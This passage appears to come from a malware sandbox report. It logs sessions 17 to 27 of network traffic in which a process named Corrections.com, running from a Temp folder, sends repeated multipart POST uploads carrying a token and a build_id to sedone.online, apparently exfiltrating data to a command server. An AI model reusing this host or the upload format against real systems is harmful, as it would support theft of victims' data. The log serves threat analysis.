2024-12-17 16:29:37 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 54 4a 57 54 52 31 56 53 4a 45 4b 46 33 37 59 55 41 31 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 54 4a 57 54 52 31 56 53 4a 45 4b 46 33 37 59 55 41 31 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 54 4a 57 54 52 31 56 53 4a 45 4b 46 33 37 59 55 41 31 36 38 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------TJWTR1VSJEKF37YUA168Content-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------TJWTR1VSJEKF37YUA168Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------TJWTR1VSJEKF37YUA168Cont
2024-12-17 16:29:38 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 17 Dec 2024 16:29:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49868 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:38 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----0Z58G4WLNYCJE3OHVAS0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 66001
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-17 16:29:38 UTC | 16355 | OUT | Data Ascii: ------0Z58G4WLNYCJE3OHVAS0Content-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------0Z58G4WLNYCJE3OHVAS0Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------0Z58G4WLNYCJE3OHVAS0Cont
2024-12-17 16:29:39 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 17 Dec 2024 16:29:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-17 16:29:39 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49874 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:41 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----9R1NG4OZU37YM7GV37Y5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 153381
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-17 16:29:41 UTC | 16355 | OUT | Data Ascii: ------9R1NG4OZU37YM7GV37Y5Content-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------9R1NG4OZU37YM7GV37Y5Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------9R1NG4OZU37YM7GV37Y5Cont
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-17 16:29:42 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 17 Dec 2024 16:29:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49880 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:42 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----0HLX4E3W4EU3E3ECTJMG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 393697
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-17 16:29:42 UTC | 16355 | OUT | Data Ascii: ------0HLX4E3W4EU3E3ECTJMGContent-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------0HLX4E3W4EU3E3ECTJMGContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------0HLX4E3W4EU3E3ECTJMGCont
2024-12-17 16:29:44 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 17 Dec 2024 16:29:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49886 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:45 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JWB1V3OP8YMYM7YMGD2N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 131557
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-17 16:29:45 UTC | 16355 | OUT | Data Ascii: ------JWB1V3OP8YMYM7YMGD2NContent-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------JWB1V3OP8YMYM7YMGD2NContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------JWB1V3OP8YMYM7YMGD2NCont
                                                                                                                                                                                                                                                  2024-12-17 16:29:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:45 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-17 16:29:46 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 17 Dec 2024 16:29:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-17 16:29:46 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49892 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:46 UTC | 329 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DB1DBAIWTRQIE3E3OH4E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 6990993
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:46 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 31 44 42 41 49 57 54 52 51 49 45 33 45 33 4f 48 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 31 44 42 41 49 57 54 52 51 49 45 33 45 33 4f 48 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 31 44 42 41 49 57 54 52 51 49 45 33 45 33 4f 48 34 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------DB1DBAIWTRQIE3E3OH4EContent-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------DB1DBAIWTRQIE3E3OH4EContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------DB1DBAIWTRQIE3E3OH4ECont
2024-12-17 16:29:54 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 17 Dec 2024 16:29:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49897 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:48 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----UKNYC2VKNGV37Q9R9R9H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-17 16:29:48 UTC | 331 | OUT
Data Ascii:
------UKNYC2VKNGV37Q9R9R9H
Content-Disposition: form-data; name="token"

7610a19a50993d198235bacee5f60466
------UKNYC2VKNGV37Q9R9R9H
Content-Disposition: form-data; name="build_id"

960009dd8757fc4c7a65dceef295f6e0
------UKNYC2VKNGV37Q9R9R9H
Cont
2024-12-17 16:29:49 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 17 Dec 2024 16:29:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-17 16:29:49 UTC | 2228 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49904 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:29:50 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IWL6F3O8GLNYM79ZUK6X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-17 16:29:50 UTC | 331 | OUT
Data Ascii:
------IWL6F3O8GLNYM79ZUK6X
Content-Disposition: form-data; name="token"

7610a19a50993d198235bacee5f60466
------IWL6F3O8GLNYM79ZUK6X
Content-Disposition: form-data; name="build_id"

960009dd8757fc4c7a65dceef295f6e0
------IWL6F3O8GLNYM79ZUK6X
Cont
2024-12-17 16:29:51 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 17 Dec 2024 16:29:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-17 16:29:51 UTC | 2208 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49933 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:30:03 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----4W4EKFCJW4EUAAASR90Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 32481
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-17 16:30:03 UTC | 16355 | OUT
Data Ascii:
------4W4EKFCJW4EUAAASR90Z
Content-Disposition: form-data; name="token"

7610a19a50993d198235bacee5f60466
------4W4EKFCJW4EUAAASR90Z
Content-Disposition: form-data; name="build_id"

960009dd8757fc4c7a65dceef295f6e0
------4W4EKFCJW4EUAAASR90Z
Cont
2024-12-17 16:30:03 UTC | 16126 | OUT
2024-12-17 16:30:04 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 17 Dec 2024 16:30:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-17 16:30:04 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49936 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:30:04 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----MYUKN7900ZU37YMY5FK6
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 4421
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-17 16:30:04 UTC | 4421 | OUT
Data Ascii:
------MYUKN7900ZU37YMY5FK6
Content-Disposition: form-data; name="token"

7610a19a50993d198235bacee5f60466
------MYUKN7900ZU37YMY5FK6
Content-Disposition: form-data; name="build_id"

960009dd8757fc4c7a65dceef295f6e0
------MYUKN7900ZU37YMY5FK6
Cont
2024-12-17 16:30:05 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 17 Dec 2024 16:30:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-17 16:30:05 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49942 | 116.203.12.114 | 443 | 7808 | C:\Users\user\AppData\Local\Temp\628056\Corrections.com
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:30:06 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----16PP890HDJM7QQ1V3OH4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 2449
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:30:06 UTC2449OUTData Raw: 2d 2d 2d 2d 2d 2d 31 36 50 50 38 39 30 48 44 4a 4d 37 51 51 31 56 33 4f 48 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 31 36 50 50 38 39 30 48 44 4a 4d 37 51 51 31 56 33 4f 48 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 31 36 50 50 38 39 30 48 44 4a 4d 37 51 51 31 56 33 4f 48 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------16PP890HDJM7QQ1V3OH4Content-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------16PP890HDJM7QQ1V3OH4Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------16PP890HDJM7QQ1V3OH4Cont
                                                                                                                                                                                                                                                  2024-12-17 16:30:07 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:30:07 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-12-17 16:30:07 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session ID:27
                                                                                                                                                                                                                                                  Source IP:192.168.2.4
                                                                                                                                                                                                                                                  Source Port:49944
                                                                                                                                                                                                                                                  Destination IP:116.203.12.114
                                                                                                                                                                                                                                                  Destination Port:443
                                                                                                                                                                                                                                                  PID:7808
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                  2024-12-17 16:30:07 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----WTRQIE37YCBIM7Q16XBI
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 6533
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:30:07 UTC6533OUTData Raw: 2d 2d 2d 2d 2d 2d 57 54 52 51 49 45 33 37 59 43 42 49 4d 37 51 31 36 58 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 57 54 52 51 49 45 33 37 59 43 42 49 4d 37 51 31 36 58 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 57 54 52 51 49 45 33 37 59 43 42 49 4d 37 51 31 36 58 42 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------WTRQIE37YCBIM7Q16XBIContent-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------WTRQIE37YCBIM7Q16XBIContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------WTRQIE37YCBIM7Q16XBICont
                                                                                                                                                                                                                                                  2024-12-17 16:30:08 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:30:08 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-12-17 16:30:08 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
